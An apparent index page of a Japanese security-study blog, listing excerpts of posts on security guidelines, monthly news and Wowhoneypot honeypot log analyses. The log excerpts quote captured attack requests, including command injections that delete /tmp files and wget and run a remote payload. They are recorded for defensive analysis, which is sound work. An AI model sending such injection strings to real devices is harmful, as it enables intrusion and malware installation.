家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

フィッシング対策ガイドラインの比較(2020年版と2019年版)

概要 フィッシング対策協議会では、フィッシング詐欺の被害を防ぐためにWebサービス事業者に向けた対策をまとめたガイドラインを公開しています。 www.antiphishing.jp 2020年度版では、最近の脅威動向を踏まえ対策要件を見直し、また、優先度の設定が見直さ…

個人情報保護法の2020年改正について

背景 色々なIT技術を使ったサービスが次々に登場し、個人情報を含む、様々な情報が活用されています。個人情報保護法ではそういった社会情勢を踏まえ、平成27年(2015年)より「いわゆる3年ごとの見直し」(附則第12条3項)を設けました。 個人情報保護法は…

2020年6月のIT・セキュリティトピック

2020年6月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/06/01 外出自粛によるECサイト利用増でフィッシングも増(BBSS) 2020/06/01 個人情報流出の54歳市職員、人事に不満か…懲戒免職 2020/06/01 Wi-Fi利用者や提供者向けセキュガイド…

Wowhoneypotログ分析(2020/05/23-2020/05/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/23-2020/05/30 ログの集計 送信元 内容 検知数 0 103.113.106.15 \"GET / 1 103.145.12.53 \"GET / 1 103.50.5.230 \"GET / 1 104.248.33.135 \"GET / 1 104.248.92.71…

「Guidelines for Securing Wireless Local Area Networks(WLANs)」の概要 NIST SP800-153

Guidelines for Securing Wireless Local Area Networks(WLANs) NIST Special Publication 800-153 発行年月日:2012年2月 https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf // 概要 このガイドラインは、NISTが企業の無線LA…

GCPのセキュリティ設定を監査してみた「Scout Suite」

背景など 最近ではクラウドの利用が進んでおり、様々な企業がクラウド上にシステムを構築し、データを格納しています。 ascii.jp クラウドは常に新しい機能が開発されており、クラウドに対する理解が浅いままシステムを構築するとセキュリティの観点からは脆…

「政府情報システムにおけるクラウドサービスの利用に係る基本方針」の概要

政府情報システムにおけるクラウドサービスの利用に係る基本方針 発行年月日:2018年6月7日 https://cio.go.jp/sites/default/files/uploads/documents/cloud_%20policy.pdf // 概要 内閣官房IT総合戦略室は、標準ガイドライン付属文書に「政府情報システム…

Wowhoneypotログ分析(2020/05/18-2020/05/22)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/18-2020/05/22 ログの集計 送信元 内容 検知数 0 105.155.16.59 \"POST /cgi-bin/mainfunction.cgi 1 114.67.202.10 \"GET /TP/public/index.php 1 =1"}">\"GET /TP/pu…

ネットワークセキュリティ製品のテスト基準を策定する「NetSecOpen」

先日、Sonicwallの製品評価に関する記事を読みました。 blog.sonicwall.com 上記の記事に出てきた「NetSecOpen」について調べてみました。 // NetSecOpenとは NetSecOPENは、ネットワークセキュリティベンダー等が参加している、会員制の非営利団体で、ネッ…

Wowhoneypotログ分析(2020/05/11-2020/05/17)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/11-2020/05/17 ログの集計 送信元 内容 検知数 0 110.154.182.132 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8…

「働き方改革のためのテレワーク導入モデル」の概要

働き方改革のためのテレワーク導入モデル 発行年月日:2019年6月発行者:総務省 https://www.soumu.go.jp/main_content/000616262.pdf // 概要と目的 「働き方改革のためのテレワーク導入モデル」は、テレワーク導入のためのノウハウやプラクティスをまとめ…

Wowhoneypotログ分析(2020/05/01-2020/05/11)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/05/01-2020/05/11 ※一部ログが取得できていない期間がありました。 ログの集計 送信元 内容 検知数 0 1.179.199.114 \"POST /cgi-bin/mainfunction.cgi 2 101.200.122.148 \"…

2020年5月のIT・セキュリティトピック

2020年5月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/05/01 盗まれたZoomのログイン情報を売買する闇市場が活況 2020/05/01 重要インフラ分野の企業に侵害リスク調査を無償提供、マクニカネットワークス 2020/05/01 三井住友銀 7万件の…

Wowhoneypotログ分析(2020/04/25-2020/04/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/25-2020/04/30 ログの集計 送信元 内容 検知数 0 1.70.13.251 \"POST /cgi-bin/mainfunction.cgi 1 103.209.1.230 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPat…

Hyper-v上にKali Linuxをインストールする

概要 Hyper-v上にKali Linuxをインストールしました。今回記事にしたのは、Hyper-vの通常の仮想マシン作成手順でインストールした際に、Kali Linuxのインストールの途中「パッケージの選択とインストール」でエラーが発生しました。そこから試行錯誤しながら…

(ようやく)モバイルPASMOを使ってみた

今更ですが2020年3月18日より、モバイルPASMOのサービスが開始となりました。 japanese.engadget.com 個人的にはかなり期待していました。毎朝、定期券を忘れないように何度も確認しながらも、時々忘れて出てしまい、その度に高い昼ごはんが食べられそうな値…

セキュリティ業務を担う人材のスキル可視化施策について調べてみた

セキュリティ業務を担う人材のスキル可視化ガイドライン 発行者:JNSA 発行年月日:2019年1月18日 https://www.jnsa.org/isepa/images/outputs/JTAG_guideline-%CE%B2_190118.pdf https://www.jnsa.org/isepa/images/outputs/JTAGreport2019.pdf // 目的 JNS…

Wowhoneypotログ分析(2020/04/21-2020/04/24)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/21-2020/04/24 ログの集計 送信元 内容 検知数 0 108.68.60.225 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}…

Wowhoneypotログ分析(2020/04/16-2020/04/18)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/16-2020/04/19 ログの集計 送信元 内容 件数 0 130.43.73.229 GET /shell?cd+/tmp;rm+-rf+*;wget+%20185.172.110.241/jaws;sh+/tmp/jaws 1 154.70.134.71 POST /cgi-bin/m…

GCPでWowhoneypotをたてる

概要 Google Cloud Platfom上でWowhoneypotを構築し、取得したログをStackdriverで閲覧できるようにします。また、ログをCloudStorageにエクスポートします。 // 構築 VMインスタンス作成 「Compute Engine」-「VMインスタンス」より、インスタンスを作成し…

SASE(Secure Access Service Edge)とは

SASEとは SASE(Secure Access Service Edge)はガートナー社が提唱しているセキュリティアーキテクチャで、昨今登場しているネットワークセキュリティソリューション(CASBやSWG等複数)をまとめて一つのソリューションとして提供するものを指しています。 …

セキュリティに関連する法律一覧

セキュリティで関連してくる法律についてまとめてみました。 // 不正アクセス禁止法 「不正アクセス禁止法」は、正式名称「不正アクセス行為の禁止等に関する法律」であり、2000年に施行されたインターネット上での不正なアクセスに関する法律のことです。 …

2020年4月のIT・セキュリティトピック

2020年4月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/04/01 Marriott系列ホテル、520万人の顧客情報が流出の可能性 2020/04/02 ZoomのMac版、インストール時にマルウェア的な挙動 セキュリティ専門家が指摘 2020/04/02 日本国内のサイバ…

AlexaでSwitchbotを操作する

概要 Switchbotは普通の(アナログの)スイッチを「押す」という動作を行ってくれるデバイスです。 スマートフォンのアプリや、専用のコントローラからBluetooth経由で操作ができるのですが、今回はすでに自宅にあるAlexaに呼びかけることで、Switchbotを操…

コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)の概要

コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)を読んでみました。ガイドラインの概要をまとめます。 コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)https://www.ipa.go.jp/files/000025341.pdf // 概要 このガイドライン…

2020年3月のIT・セキュリティトピック

2020年3月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/03/01 不正アクセスし人事評価を閲覧 磐田市主任を減給 /静岡 2020/03/02 カードショップBIG-WEB、平文パスワード含む会員情報流出(ホビーズファクトリー) 2020/03/02 ロリポップ…

CISベンチマークについて

自分の勉強のために、CISが公開している資料を読んでみました。 www.cisecurity.org // CISとは CIS(Center for Internet Security)は、セキュリティ推進のためのアメリカの非営利団体で、セキュリティの基準等を公開しています。 www.jiten.com CISベンチマ…

ゼロトラストについて調べてみた(NIST SP800-207)

ゼロトラストについてNISTのガイドライン(ドラフト)が公開されていました。 Draft NIST Special Publication 800-207(Zero Trust Architecture) https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207-draft.pdf 従来のセキュリティモデ…

NIST SP800-40の概要

概要 NIST SP800-40は、脆弱性とパッチの管理についてのガイドラインです。日本語版について、IPAでは「NIST SP 800-40 Version 2.0(パッチおよび脆弱性管理プログラムの策定)」を公開しており、ゾーホージャパン株式会社では「Revision 3(エンタープライ…

BYODにおけるセキュリティ対策の考え方

私物端末の業務利用におけるセキュリティ要件の考え方 https://www.kantei.go.jp/jp/singi/it2/cio/hosakan/wg_report/byod.pdf // 概要 この資料では、BYOD(Bring Your Own Device=私物端末を業務に利用すること)におけるセキュリティの考え方を解説してい…